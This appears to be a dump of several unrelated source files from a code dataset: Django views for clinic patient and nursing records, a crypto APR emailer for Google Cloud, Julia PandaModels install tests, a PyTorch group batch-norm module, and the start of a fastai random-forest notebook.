                        edad = paciente.edad,
                        diagnosticonosologico = request.POST['diagnosticoNosologicoBreve'],
                        usuario_id = u.perfil_usuario.id,
                        expediente_id = expediente.id
                    )
                mensaje = "ok"
        except ValueError as e:
            logger.error(str(e))
            mensaje = "Valor no valido, revisar los valores que se ingresan."
        except:
            logger.error(sys.exc_info()[0])
            mensaje = "Error al actualizar la hoja de prevaloracion."
        response = JsonResponse({'isOk' : mensaje})
        return HttpResponse(response.content)
    else:
        raise Http404
#@csrf_exempt
def addHojaPrevaloracion(request):
    """Create or update a pre-assessment sheet (hoja de prevaloracion).

    POST with 'clave' > 0 updates the existing sheet, replaces the file's
    medical-area service/program assignments and refreshes the doctor's
    front sheet. Otherwise it creates the file (expediente), the sheet,
    the front sheet and the consent letter -- but only when at least one
    service was assigned ('correspondio'). Responds with JSON
    {'curp', 'correspondio', 'isOk'} where 'ok' signals success.
    Raises Http404 for non-POST requests.
    """
    if request.POST:
        clave = RepresentsInt(request.POST['clave'])
        if clave > 0:
            # Fix: initialize before the try block. In the original,
            # 'correspondio' was only bound inside the try, so an early
            # failure raised NameError when building the JSON response below.
            correspondio = False
            try:
                with transaction.atomic():
                    servicios = request.POST.getlist('servicios[]')
                    programas = request.POST.getlist('programas[]')
                    paciente = Paciente.objects.get(curp=request.POST['curp'])
                    hojaPrevaloracion = HojaPrevaloracion.objects.get(id=request.POST['clave'])
                    expediente = Expediente.objects.get(id=hojaPrevaloracion.expediente.id)
                    hojaFrontal = HojaFrontal.objects.get(expediente__id=expediente.id, fechacreacion=date.today(), usuario__id=hojaPrevaloracion.doctor.id)
                    # 'correspondio' records whether any service was assigned.
                    if len(servicios) > 0:
                        paciente.correspondio = True
                        paciente.save()
                    else:
                        paciente.correspondio = False
                        paciente.save()
                    correspondio = paciente.correspondio
                    hojaPrevaloracion.motivoconsulta = request.POST['motivoConsulta']
                    hojaPrevaloracion.diagnosticonosologico = request.POST['diagnosticoNosologico']
                    hojaPrevaloracion.canalizacion = request.POST['canalizacion']
                    hojaPrevaloracion.edad = paciente.edad
                    hojaPrevaloracion.ocupacion_id = paciente.ocupacion.id
                    hojaPrevaloracion.referidopor_id = paciente.referidopor.id
                    hojaPrevaloracion.escolaridad_id = paciente.escolaridad.id
                    hojaPrevaloracion.save()
                    # Replace only the medical-area assignments; the
                    # psychology-area ones (SERVICIOS/PROGRAMAS_EXCLUIDOS_MEDICO)
                    # are managed by addPsicologiaHojaPrevaloracion.
                    tmpVarS = ServicioExpediente.objects.filter(expediente__id=expediente.id).exclude(servicio__servicio__in=SERVICIOS_EXCLUIDOS_MEDICO)
                    tmpVarP = ProgramaExpediente.objects.filter(expediente__id=expediente.id).exclude(programa__programa__in=PROGRAMAS_EXCLUIDOS_MEDICO)
                    tmpVarS.delete()
                    tmpVarP.delete()
                    for servicio in servicios:
                        ServicioExpediente.objects.create(
                            expediente_id = expediente.id,
                            servicio_id = servicio,
                            hojaPrevaloracion_id = hojaPrevaloracion.id,
                            # NOTE(review): fechaBaja stamped with today's date
                            # at creation -- confirm intended semantics.
                            fechaBaja = date.today()
                        )
                    for programa in programas:
                        ProgramaExpediente.objects.create(
                            expediente_id = expediente.id,
                            programa_id = programa,
                            hojaPrevaloracion_id = hojaPrevaloracion.id,
                            fechaBaja = date.today()
                        )
                    hojaFrontal.diagnosticonosologico = request.POST['diagnosticoNosologico']
                    hojaFrontal.save()
                    mensaje = "ok"
            except ValueError as e:
                logger.error(str(e))
                mensaje = "Valor no valido, revisar los valores que se ingresan."
            except Exception:
                # Narrowed from a bare 'except:'.
                logger.error(sys.exc_info()[0])
                mensaje = "Error al crear la hoja de prevaloracion."
        else:
            try:
                correspondio = False
                with transaction.atomic():
                    mensaje = "Error al crear la hoja de prevaloracion"
                    paciente = Paciente.objects.get(curp=request.POST['curp'])
                    # 'correspondio' is null until a sheet has been made; a
                    # boolean value means one already exists today.
                    if str(paciente.correspondio) == "True" or str(paciente.correspondio) == "False":
                        mensaje = "Ya cuenta con una hoja de prevaloracion hecha el dia de hoy."
                        response = JsonResponse({'curp' : request.POST['curp'], 'correspondio' : correspondio,
                                                 'isOk' : mensaje})
                        return HttpResponse(response.content)
                    servicios = request.POST.getlist('servicios[]')
                    programas = request.POST.getlist('programas[]')
                    if len(servicios) > 0:
                        paciente.correspondio = True
                        paciente.save()
                        claveExpediente = getUpdateConsecutiveExpendiete()
                        expediente = Expediente.objects.create(
                            claveexpediente = claveExpediente,
                            paciente_id = paciente.id,
                            # NOTE(review): hard-coded registration date -- confirm.
                            fechaalta = "2015-03-30",
                        )
                        u = User.objects.get(username=request.user)
                        hojaPreValoracion = HojaPrevaloracion.objects.create(
                            motivoconsulta = request.POST['motivoConsulta'],
                            diagnosticonosologico = request.POST['diagnosticoNosologico'],
                            canalizacion = request.POST['canalizacion'],
                            edad = paciente.edad,
                            ocupacion_id = paciente.ocupacion.id,
                            referidopor_id = paciente.referidopor.id,
                            escolaridad_id = paciente.escolaridad.id,
                            doctor_id = u.perfil_usuario.id,
                            # NOTE(review): placeholder psychologist id -- confirm.
                            psicologo_id = 1,
                            expediente_id = expediente.id
                        )
                        for servicio in servicios:
                            ServicioExpediente.objects.create(
                                expediente_id = expediente.id,
                                servicio_id = servicio,
                                hojaPrevaloracion_id = hojaPreValoracion.id,
                                fechaBaja = date.today()
                            )
                        for programa in programas:
                            ProgramaExpediente.objects.create(
                                expediente_id = expediente.id,
                                programa_id = programa,
                                hojaPrevaloracion_id = hojaPreValoracion.id,
                                fechaBaja = date.today()
                            )
                        hojaFrontal = HojaFrontal.objects.create(
                            edad = paciente.edad,
                            diagnosticonosologico = request.POST['diagnosticoNosologico'],
                            usuario_id = u.perfil_usuario.id,
                            expediente_id = expediente.id
                        )
                        """
                        if paciente.edad > 18:
                            print request.POST['nombreResponsable'] #= ""
                            print request.POST['apellidosResponsable'] #= ""
                            print request.POST['edadResponsable'] #= ""
                            print request.POST['parentescoResponsable'] #= ""
                            print request.POST['domicilioResponsable'] #= ""
                            print request.POST['coloniaResponsable'] #= ""
                            print request.POST['codigopostalResponsable'] #= ""
                        """
                        cartaConsentimiento = CartaConsetimiento.objects.create(
                            edad = paciente.edad,
                            calle = paciente.calle,
                            entrecalles = paciente.entrecalles,
                            numerocasa = paciente.numerocasa,
                            colonia = paciente.colonia,
                            codigopostal = paciente.codigopostal,
                            estadoprocedente_id = paciente.estadoprocedente.id,
                            municipio_id = paciente.municipio.id,
                            nombreresponsable = request.POST['nombreResponsable'],
                            apellidosresponsable = request.POST['apellidosResponsable'],
                            edadresponsable = request.POST['edadResponsable'],
                            generoresponsable = request.POST['generoResponsable'],
                            parentescoresponsable = request.POST['parentescoResponsable'],
                            domicilioresponsable = request.POST['domicilioResponsable'],
                            coloniaresponsable = request.POST['coloniaResponsable'],
                            codigopostalresponsable = request.POST['codigopostalResponsable'],
                            telefonoresponsable = request.POST['telefonoResponsable'],
                            doctor_id = u.perfil_usuario.id,
                            expediente_id = expediente.id,
                            diagnostico = request.POST['diagnosticoNosologico']
                        )
                        correspondio = True
                    else:
                        # No service assigned: record the visit, create nothing.
                        paciente.correspondio = False
                        paciente.save()
                    mensaje = "ok"
            except ValueError as e:
                logger.error(str(e))
                mensaje = "Valor no valido, revisar los valores que se ingresan."
            except Exception:
                # Narrowed from a bare 'except:'.
                logger.error(sys.exc_info()[0])
                mensaje = "Error al crear la hoja de prevaloracion."
        response = JsonResponse({'curp' : request.POST['curp'], 'correspondio' : correspondio,
                                 'isOk' : mensaje})
        return HttpResponse(response.content)
    else:
        raise Http404
def addDataEnfermeria(request):
    """Create or update a nursing-data (PacienteDataEnfermeria) record.

    POST parameters: 'clave' (existing record id; non-positive/invalid means
    create a new record), 'curp' (patient lookup key), the vitals 'peso',
    'talla', 'fc', 'ta', 'gluc', 'cintura' and, on creation only,
    'mensajeInformativo'. Responds with JSON {'isOk': 'ok' | <error text>}.
    Raises Http404 for non-POST requests.
    """
    if request.POST:
        # RepresentsInt returns -1 on invalid input, routing to the create branch.
        clave = RepresentsInt(request.POST['clave'])
        if clave > 0:
            # Update an existing nursing-data record in place.
            try:
                # Pessimistic default; overwritten with "ok" on success.
                mensaje = "Error al actualizar datos de enfermeria."
                paciente = Paciente.objects.get(curp=request.POST['curp'])
                dataEnfermeria = PacienteDataEnfermeria.objects.get(id=request.POST['clave'])
                dataEnfermeria.peso = request.POST['peso']
                dataEnfermeria.talla = request.POST['talla']
                dataEnfermeria.f_c = request.POST['fc']
                dataEnfermeria.t_a = request.POST['ta']
                dataEnfermeria.glucosa = request.POST['gluc']
                dataEnfermeria.cintura = request.POST['cintura']
                dataEnfermeria.save()
                mensaje = "ok"
            except ValueError as e:
                logger.error(str(e))
                mensaje = "Valor no valido, revisar los valores que se ingresan."
            except:
                # NOTE(review): bare except masks unexpected errors (including
                # Paciente.DoesNotExist) behind a generic message — consider narrowing.
                logger.error(sys.exc_info()[0])
                mensaje = "Error al actualizar datos de enfermeria."
        else:
            # Create a new nursing-data record attributed to the current user.
            try:
                mensaje = "Error al guardar datos de enfermeria."
                paciente = Paciente.objects.get(curp=request.POST['curp'])
                u = User.objects.get(username=request.user)
                dataEnfermeriaPaciente = PacienteDataEnfermeria.objects.create(
                    paciente_id = paciente.id,
                    edad = paciente.edad,
                    peso = request.POST['peso'],
                    talla = request.POST['talla'],
                    f_c = request.POST['fc'],
                    t_a = request.POST['ta'],
                    glucosa = request.POST['gluc'],
                    cintura = request.POST['cintura'],
                    enfermera_id = u.perfil_usuario.id,
                    mensaje_informativo = request.POST['mensajeInformativo'],
                )
                mensaje = "ok"
            except ValueError as e:
                logger.error(str(e))
                mensaje = "Valor no valido, revisar los valores que se ingresan."
            except:
                logger.error(sys.exc_info()[0])
                mensaje = "Error al guardar datos de enfermeria."
        response = JsonResponse({'isOk' : mensaje})
        return HttpResponse(response.content)
    else:
        raise Http404
def agregar_paciente(request):
    """AJAX endpoint: create a new Paciente from the POSTed registration form.

    Responds with JSON echoing nombre/apellidoP/curp plus the resolved
    municipio description and an 'isOk' status ('ok' or a Spanish error
    message). Non-AJAX requests get a 404.
    """
    if request.is_ajax():
        #paciente = Paciente.objects().filter(curp=request.POST['curp'])
        try:
            # Pessimistic defaults; replaced on successful creation.
            mensaje = "Error al crear el parciente"
            municipio = "Generico"
            u = User.objects.get(username=request.user)
            #municipio = Municipio.objects.get(descripcion=request.POST['localidad'])
            #estado = Estado.objects.get(descripcion=request.POST['estado'])
            pacienteTemp = Paciente.objects.create(
                nombre = request.POST['nombre'],
                apellidoP = request.POST['apellidoP'],
                apellidoM = request.POST['apellidoM'],
                curp = request.POST['curp'],
                edad = request.POST['edad'],
                genero = request.POST['genero'],
                fechanacimiento = request.POST['fechaN'],
                telefonocasa = request.POST['telCasa'],
                telefonocelular = request.POST['celular'],
                estadoprocedente_id = request.POST['estado'],
                municipio_id = request.POST['municipio'],
                localidad = request.POST['localidad'],
                calle = request.POST['calle'],
                entrecalles = request.POST['entreCalles'],
                colonia = request.POST['colonia'],
                numerocasa = request.POST['numCasa'],
                codigopostal = request.POST['codigoPostal'],
                ocupacion_id = request.POST['ocupacion'],
                referidopor_id = request.POST['referidopor'],
                escolaridad_id = request.POST['escolaridad'],
                #correspondio = request.POST[''],
                usuariocreacion_id = u.perfil_usuario.id,
            )
            municipio = pacienteTemp.municipio.descripcion
            mensaje = "ok"
        except IntegrityError as e:
            # Unique-key violation: the CURP already exists.
            logger.error(str(e))
            mensaje = "La curp del paciente ya existe en la base de datos."
        except ValueError as e:
            logger.error(str(e))
            mensaje = "Valor no valido, revisar los valores que se ingresan."
        except:
            # NOTE(review): bare except hides unexpected failures behind a
            # generic message — consider narrowing.
            logger.error(sys.exc_info()[0])
            mensaje = "Error al crear el parciente."
        response = JsonResponse({'nombre' : request.POST['nombre'],'apellidoP' : request.POST['apellidoP'],
            'curp' : request.POST['curp'], 'correspondio' : 'None', 'municipio' : municipio, 'isOk' : mensaje})
        return HttpResponse(response.content)
    else:
        raise Http404
def my_custom_page_not_found_view(request):
    """Render the custom 404 page.

    Bug fix: the original called ``render('404.html')`` without the required
    ``request`` argument and discarded the result, so the handler returned
    ``None`` (Django raises "view didn't return an HttpResponse"). A 404
    handler should also carry status code 404 so clients see the right status.
    """
    response = render(request, '404.html')
    response.status_code = 404
    return response
def getUserGroupByRequest(request):
    """Return the label for the first known auth group the user belongs to.

    Groups are probed in a fixed priority order (Informacion first,
    Enfermeria last); returns '' when the user is in none of them.
    """
    priority = (
        ('Informacion', 'informacion'),
        ('RevisionMedica', 'revisionMedica'),
        ('RevisionPsicologica', 'revisionPsicologica'),
        ('TrabajoSocial', 'trabajoSocial'),
        ('Imprimir', 'imprimir'),
        ('Enfermeria', 'enfermeria'),
    )
    for group_name, label in priority:
        try:
            # .get raises Group.DoesNotExist when the user lacks the group.
            request.user.groups.get(name=group_name)
            return label
        except Group.DoesNotExist:
            continue
    return ""
def RepresentsInt(valor):
    """Parse *valor* as an int, returning -1 when it cannot be converted.

    Callers use the -1 sentinel to route between create/update flows, so
    invalid input must never raise. Bug fix: the original caught only
    ValueError, so non-string/number inputs (e.g. None) raised an uncaught
    TypeError; both are now mapped to -1.
    """
    try:
        return int(valor)
    except (ValueError, TypeError):
        return -1
12,401 | 0856628754fa14d7744dae0628ea80c27994b89b | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 30 18:25:13 2021
@author: klaus
"""
from prettytable import PrettyTable
import os
from google.cloud import storage
storage_client = storage.Client()
BUCKET_NAME=os.getenv('DATA_BUCKET')
BASE_PATH="/tmp/"
RECIEVER_EMAIL="YOUREMAIL@xyz.xy"
Contracts={
"Yearn-crvDUSD":"0x30FCf7c6cDfC46eC237783D94Fc78553E79d4E9C",
"Yearn-crvUSDN":"0x3B96d491f067912D18563d56858Ba7d6EC67a6fa",
"Yearn-crvBBTC":"0x8fA3A9ecd9EFb07A8CE90A6eb014CF3c0E3B32Ef",
"Yearn-crvOBTC":"0xe9Dc63083c464d6EDcCFf23444fF3CFc6886f6FB",
"CURVE-crvDUSD":"0x8038C01A0390a8c547446a0b2c18fc9aEFEcc10c",
"CURVE-crvUSDN":"0x0f9cb53Ebe405d49A0bbdBD291A65Ff571bC83e1",
"CURVE-crvOBTC":"0xd81dA8D904b52208541Bade1bD6595D8a251F8dd",
"CURVE-crvBBTC":"0x071c661B4DeefB59E2a3DdB20Db036821eeE8F4b",
"Yearn-crvUSDP":"0xC4dAf3b5e2A9e93861c3FBDd25f1e943B8D87417",
"CURVE-crvUSDP":"0x42d7025938bEc20B69cBae5A77421082407f053A",
"Yearn-crvEURS":"0x25212Df29073FfFA7A67399AcEfC2dd75a831A1A",
"CURVE-crvEURS":"0x0Ce6a5fF5217e38315f87032CF90686C96627CAA",
"Yearn-USDC":"0x5f18C75AbDAe578b483E5F43f12a39cF75b973a9",
"Yearn-crvPBTC":"0x3c5DF3077BcF800640B5DAE8c91106575a4826E6",
"CURVE-crvPBTC":"0x7F55DDe206dbAD629C080068923b36fe9D6bDBeF",
"Yearn-crvTBTC":"0x23D3D0f1c697247d5e0a9efB37d8b0ED0C464f7f",
"CURVE-crvTBTC":"0xC25099792E9349C7DD09759744ea681C7de2cb66",
}
def download_blob(bucket_name, source_blob_name, destination_file_name):
    """Downloads a blob from the bucket.

    Silently does nothing when *source_blob_name* is not present in the bucket.
    """
    # bucket_name = "your-bucket-name"
    # source_blob_name = "storage-object-name"
    # destination_file_name = "local/path/to/file"
    bucket = storage_client.bucket(bucket_name)
    # NOTE(review): listing (and printing) every blob in the bucket just to
    # check existence is O(bucket size); bucket.blob(...).download_to_filename
    # would fetch directly, raising NotFound when absent — confirm the silent
    # no-op on a missing blob is intended before simplifying.
    blobs = storage_client.list_blobs(bucket_name)
    for blob in blobs:
        print(blob.name)
        if (blob.name == source_blob_name):
            # Construct a client side representation of a blob.
            # Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve
            # any content from Google Cloud Storage. As we don't need additional data,
            # using `Bucket.blob` is preferred here.
            blob = bucket.blob(source_blob_name)
            blob.download_to_filename(destination_file_name)
            print(
                "Blob {} downloaded to {}.".format(
                    source_blob_name, destination_file_name
                )
            )
def calc_apr(row_new, row_old, index):
    """Annualised percentage rate between two CSV history rows.

    Each row is "timestamp,name0,value0,name1,value1,..."; *index* selects
    which value pair to compare. The per-second rate is scaled to a yearly
    percentage and rounded to one decimal place.
    """
    col = 2 + 2 * index
    new_fields = row_new.split(",")
    old_fields = row_old.split(",")
    delta_value = float(new_fields[col]) - float(old_fields[col])
    delta_seconds = int(new_fields[0]) - int(old_fields[0])
    seconds_per_year = 3600 * 24 * 365
    return round(delta_value / delta_seconds * seconds_per_year * 100, 1)
def get_row_with_age(data, age):
    """Return the newest row at least *age* seconds older than the last row.

    *data* is a list of CSV lines whose first field is a unix timestamp;
    data[0] is treated as a header and never returned. The returned row has
    its trailing newline stripped. Falls back to the first data row when no
    row is old enough.
    """
    latest_ts = int(data[-1].split(",")[0])
    # Walk from the newest row back towards the oldest (skipping the header).
    for row in reversed(data[1:]):
        print(row)
        if latest_ts - int(row.split(",")[0]) > age:
            return row.split("\n")[0]
    print("no row with age of ", age, "found")
    return data[1].split("\n")[0]
from datetime import datetime
def create_timestamp_diff(row_new, row_old):
    """Format the two rows' leading unix timestamps as 'dd.mm.yyyy-dd.mm.yyyy'."""
    fmt = '%d.%m.%Y'
    start = datetime.utcfromtimestamp(int(row_old.split(",")[0]))
    end = datetime.utcfromtimestamp(int(row_new.split(",")[0]))
    return "-".join([start.strftime(fmt), end.strftime(fmt)])
def create_timestamp_diff_short(row_new, row_old):
    """Format the two rows' leading unix timestamps as 'dd.mm-dd.mm' (no year)."""
    fmt = '%d.%m'
    start = datetime.utcfromtimestamp(int(row_old.split(",")[0]))
    end = datetime.utcfromtimestamp(int(row_new.split(",")[0]))
    return "-".join([start.strftime(fmt), end.strftime(fmt)])
def get_last_apr():
    """Compute combined Yearn+Curve APRs over several look-back windows.

    Downloads history_apy.csv from the data bucket, derives weekly / bi-weekly
    / monthly / total APRs for every non-USDC pool column, then compounds each
    Yearn pool's APR with its matching CURVE pool's APR. Returns a dict
    {pool_name: [week, biweek, month, total]} plus a "Time-period" entry
    holding the corresponding date-range labels.
    """
    file='history_apy.csv'
    download_blob(BUCKET_NAME, file, BASE_PATH+file)
    apy_data=dict()
    with open(BASE_PATH+file, 'r') as f:
        data=f.readlines()
        # Columns after the leading timestamp come in (name, value) pairs.
        for n in range(int((len(data[-1].split(","))-1)/2)):
            name=data[-1].split(",")[1+2*n]
            #if not ("CURVE" in name):
            if not ("USDC" in name):
                # data[1] is the oldest data row; data[-1] the newest.
                total_row=data[1].split("\n")[0]
                last_row=data[-1].split("\n")[0]
                month_row=get_row_with_age(data,3600*24*365/12)
                bi_week_row=get_row_with_age(data,3600*24*14)
                week_row=get_row_with_age(data,3600*24*7)
                apr_total=calc_apr(last_row,total_row,n)
                time_total=create_timestamp_diff(last_row,total_row)
                apr_month=calc_apr(last_row,month_row,n)
                time_month=create_timestamp_diff_short(last_row,month_row)
                apr_week=calc_apr(last_row,week_row,n)
                time_week=create_timestamp_diff_short(last_row,week_row)
                apr_biweek=calc_apr(last_row,bi_week_row,n)
                time_biweek=create_timestamp_diff_short(last_row,bi_week_row)
                apy_data["Time-period"]=[time_week,time_biweek,time_month,time_total]
                apy_data[name]=[apr_week,apr_biweek,apr_month,apr_total]
    print(apy_data)
    apy_data_final=dict()
    apy_data_final["Time-period"]=[time_week,time_biweek,time_month,time_total]
    for key in apy_data.keys():
        if ("Yearn" in key):
            yearn_apy=apy_data[key]
            # Pair e.g. "Yearn-crvDUSD" with "CURVE-crvDUSD"; missing Curve
            # pools contribute zero APR.
            curve_key="CURVE-crv"+key.split("crv")[1]
            curve_apy=apy_data.get(curve_key,[0,0,0,0])
            apy_data_final[key]=list()
            for k in range(len(yearn_apy)):
                # Compound the two percentage rates: (1+a)(1+b)-1, back to %.
                combined_apy=round(((yearn_apy[k]/100+1)*(curve_apy[k]/100+1)-1)*100,1)
                apy_data_final[key].append(combined_apy)
    print(apy_data_final)
    return apy_data_final
def prepare_email(data):
    """Render the APR dict as an ASCII table string (one row per dict key)."""
    table = PrettyTable()
    table.field_names = ["Pool-Name", "Weekly-[%] ", "BiWeekly-[%]", "Monthly-[%]", "Total-APR %"]
    # Each dict entry maps a pool name to its list of APR values.
    for pool_name, values in data.items():
        table.add_row([pool_name] + values)
    rendered = table.get_string()
    print(rendered)
    return rendered
def send_email(data):
    """Email the formatted APR table as plain text via Gmail SMTP.

    Credentials come from the EMAIL_USER / EMAIL_PWD environment variables;
    the connection is upgraded with STARTTLS before login. Recipients are the
    hard-coded RECIEVER_EMAIL list.
    """
    from email.mime.text import MIMEText
    from email.mime.multipart import MIMEMultipart
    import smtplib, ssl
    port = 587 # For starttls
    smtp_server = "smtp.gmail.com"
    sender_email = os.getenv('EMAIL_USER')
    password=os.getenv('EMAIL_PWD')
    receiver_email = [RECIEVER_EMAIL]
    table=prepare_email(data)
    context = ssl.create_default_context()
    with smtplib.SMTP(smtp_server, port) as server:
        server.starttls(context=context)
        server.login(sender_email, password)
        # One message per recipient so each gets an individual To: header.
        for reciever in receiver_email:
            message = MIMEMultipart("alternative")
            message["Subject"] = "My Crypto update"
            message["From"] = sender_email
            text=table
            part1 = MIMEText(text, "plain")
            message.attach(part1)
            message["To"] = reciever
            server.sendmail(message["From"], message["To"], message.as_string())
def send_apr_data(request):
    """Cloud-Function style entry point: compute the latest APRs and mail them.

    *request* matches the HTTP-trigger signature but is unused.
    """
    last_apr=get_last_apr()
    send_email(last_apr)
|
12,402 | dda9de04af78c69a873ca9dd91c1dcb577ea9990 | # Copyright (c) 2016-2023 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import pytest
try:
from julia.core import UnsupportedPythonError
except ImportError:
UnsupportedPythonError = Exception
try:
from julia import Main
from julia import Pkg
from julia import Base
julia_installed = True
except (ImportError, RuntimeError, UnsupportedPythonError) as e:
julia_installed = False
try:
import pandaplan.core.pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
@pytest.mark.slow
@pytest.mark.skipif(not julia_installed, reason="requires julia installation")
def test_julia_connection():
    """Smoke test: pyjulia imports and can attach to a Julia runtime."""
    try:
        import julia
    except ImportError as err:
        # Narrowed from a bare ``except:`` (which also swallowed
        # KeyboardInterrupt/SystemExit); chain the original cause and fix
        # the "properlly" typo in the message.
        raise ImportError(
            "install pyjulia properly to run PandaModels.jl") from err
    try:
        julia.Julia()
    except Exception as err:
        raise UserWarning(
            "cannot connect to julia, check pyjulia configuration") from err
@pytest.mark.slow
@pytest.mark.skipif(not julia_installed, reason="requires julia installation")
# @pytest.mark.dependency(depends=['test_julia_connection'])
def test_pandamodels_installation():
    """Reinstall PandaModels.jl from the registry and import it in base mode.

    Side effects: removes any existing PandaModels installation, then adds,
    builds and resolves it again via the Julia package manager.
    """
    if Base.find_package("PandaModels"):
        # remove PandaModels to reinstall it
        Pkg.rm("PandaModels")
        Pkg.resolve()
    else:
        logger.info("PandaModels is not installed yet!")
    # Fresh install from the (freshly updated) general registry.
    Pkg.Registry.update()
    Pkg.add("PandaModels")
    Pkg.build()
    Pkg.resolve()
    logger.info("PandaModels is added to julia packages")
    try:
        Main.using("PandaModels")
        logger.info("using PandaModels in its base mode!")
    except ImportError:
        raise ImportError("cannot use PandaModels in its base mode")
@pytest.mark.slow
@pytest.mark.skipif(not julia_installed, reason="requires julia installation")
# @pytest.mark.dependency(depends=['test_julia_connection'])
def test_pandamodels_dev_mode():
    """Install PandaModels.jl in development mode, import it, then restore base mode.

    Side effects: removes any existing installation, re-adds it, switches to
    ``Pkg.develop`` with full dependency instantiation, and finally frees the
    package back to its registry version.
    """
    if Base.find_package("PandaModels"):
        # remove PandaModels to reinstall it
        Pkg.rm("PandaModels")
        Pkg.resolve()
    Pkg.Registry.update()
    Pkg.add("PandaModels")
    logger.info("installing dev mode is a slow process!")
    Pkg.resolve()
    Pkg.develop("PandaModels")
    # add pandamodels dependencies: slow process
    Pkg.instantiate()
    Pkg.build()
    Pkg.resolve()
    logger.info("dev mode of PandaModels is added to julia packages")
    try:
        Pkg.activate("PandaModels")
        Main.using("PandaModels")
        logger.info("using PandaModels in its dev mode!")
    except ImportError:
        # assert False
        raise ImportError("cannot use PandaModels in its dev mode")
    # activate julia base mode
    Pkg.activate()
    Pkg.free("PandaModels")
    Pkg.resolve()
if __name__ == '__main__':
    # Allow running this module directly: delegate to pytest on this file.
    pytest.main([__file__])
|
12,403 | 7abefbd89afe858eaadc427dfa0a81db60216aca | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
class GroupBatchNorm(nn.Module):
    """Batch normalization computed over channel groups.

    The ``num_features`` channels are partitioned into ``num_groups`` groups
    and the input is reshaped so that each group plays the role of one channel
    of a standard batch norm: statistics for a group are pooled over the batch
    dimension, the channels inside the group and all remaining (spatial)
    dimensions, with one running mean/var entry tracked per group. The
    optional affine transform, by contrast, keeps one weight/bias value per
    original channel.
    """

    def __init__(self, num_features, num_groups=1, num_channels=0, dim=4, eps=1e-5, momentum=0.1, affine=True, mode=0,
                 *args, **kwargs):
        """
        Args:
            num_features: number of input channels (size of dimension 1).
            num_groups: number of normalization groups; must divide
                ``num_features``.
            num_channels: if > 0, channels per group; then overrides
                ``num_groups`` (``num_groups = num_features // num_channels``).
            dim: expected number of input dimensions (4 for NCHW).
            eps: numerical-stability constant passed to ``F.batch_norm``.
            momentum: running-statistics update factor.
            affine: if True, learn a per-channel weight and bias.
            mode: > 0 always use batch statistics, 0 follow ``self.training``,
                < 0 always use the running statistics.
        """
        super(GroupBatchNorm, self).__init__()
        if num_channels > 0:
            assert num_features % num_channels == 0
            num_groups = num_features // num_channels
        assert num_features % num_groups == 0
        self.num_features = num_features
        self.num_groups = num_groups
        self.dim = dim
        self.eps = eps
        self.momentum = momentum
        self.affine = affine
        self.mode = mode
        # Broadcast shape (1, C, 1, ...) for the per-channel affine parameters.
        self.shape = [1] * dim
        self.shape[1] = num_features
        if self.affine:
            self.weight = Parameter(torch.Tensor(*self.shape))
            self.bias = Parameter(torch.Tensor(*self.shape))
        else:
            self.register_parameter('weight', None)
            self.register_parameter('bias', None)
        # One running mean/var entry per group (not per channel).
        self.register_buffer('running_mean', torch.zeros(num_groups))
        self.register_buffer('running_var', torch.ones(num_groups))
        self.reset_parameters()

    def reset_running_stats(self):
        # Reset running statistics to the identity normalization.
        self.running_mean.zero_()
        self.running_var.fill_(1)

    def reset_parameters(self):
        """Reset running statistics and re-initialize the affine parameters."""
        self.reset_running_stats()
        if self.affine:
            # NOTE(review): weight is initialized uniform [0, 1) rather than
            # to ones (the nn.BatchNorm default) — confirm this is intended.
            nn.init.uniform_(self.weight)
            nn.init.zeros_(self.bias)

    def forward(self, input: torch.Tensor):
        # mode > 0 forces batch statistics, mode < 0 forces running
        # statistics, mode == 0 follows the module's train/eval state.
        training = self.mode > 0 or (self.mode == 0 and self.training)
        assert input.dim() == self.dim and input.size(1) == self.num_features
        sizes = input.size()
        # Fold (N, C, ...) into (N*C/G, G, ...) so each group becomes one
        # "channel" for the underlying batch-norm kernel.
        reshaped = input.view(sizes[0] * sizes[1] // self.num_groups, self.num_groups, *sizes[2:self.dim])
        output = F.batch_norm(reshaped, self.running_mean, self.running_var, training=training, momentum=self.momentum,
                              eps=self.eps)
        output = output.view_as(input)
        if self.affine:
            # Per-channel affine transform applied after group normalization.
            output = output * self.weight + self.bias
        return output

    def extra_repr(self):
        # Configuration summary shown inside repr(module).
        return '{num_features}, num_groups={num_groups}, eps={eps}, momentum={momentum}, affine={affine}, ' \
               'mode={mode}'.format(**self.__dict__)
if __name__ == '__main__':
    # Quick smoke test: 64 channels in 16 groups; momentum=1 makes the
    # running stats equal to the last batch's statistics.
    GBN = GroupBatchNorm(64, 16, momentum=1)
    print(GBN)
    # print(GBN.weight)
    # print(GBN.bias)
    # Input deliberately shifted/scaled so normalization has visible effect.
    x = torch.randn(4, 64, 32, 32) * 2 + 1
    print('x mean = {}, var = {}'.format(x.mean(), x.var()))
    y = GBN(x)
    print('y size = {}, mean = {}, var = {}'.format(y.size(), y.mean(), y.var()))
    print(GBN.running_mean, GBN.running_var)
|
12,404 | 65cc60d0acecd6ae9a063548cfa616fcc2a93e4d | # **Important: This notebook will only work with fastai-0.7.x. Do not try to run any fastai-1.x code from this path in the repository because it will load fastai-0.7.x**
# # Random Forest Model interpretation
# %load_ext autoreload
# %autoreload 2
# +
# %matplotlib inline
from fastai.imports import *
from fastai.structured import *
# from pandas_summary import DataFrameSummary
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier
from IPython.display import display
from sklearn import metrics
# -
set_plot_sizes(12,14,16)
# ## Load in our data from last lesson
# +
PATH = "data/bulldozers/"
df_raw = pd.read_feather('tmp/bulldozers-raw')
df_trn, y_trn, nas = proc_df(df_raw, 'SalePrice')
# -
def split_vals(a, n):
    """Split an indexable into its first *n* items and the remainder."""
    head = a[:n]
    tail = a[n:]
    return head, tail
n_valid = 12000
n_trn = len(df_trn)-n_valid
X_train, X_valid = split_vals(df_trn, n_trn)
y_train, y_valid = split_vals(y_trn, n_trn)
raw_train, raw_valid = split_vals(df_raw, n_trn)
# +
def rmse(x, y):
    """Root-mean-squared error between two array-likes (elementwise)."""
    squared_error = (x - y) ** 2
    return math.sqrt(squared_error.mean())
def get_scores(m, config=None):
    """Collect train/dev RMSE and R² for fitted model *m* into a one-row DataFrame.

    NOTE(review): reads the module-level globals X_train/y_train/X_valid/y_valid,
    so the reported scores reflect whatever split is current at call time.
    """
    res = {
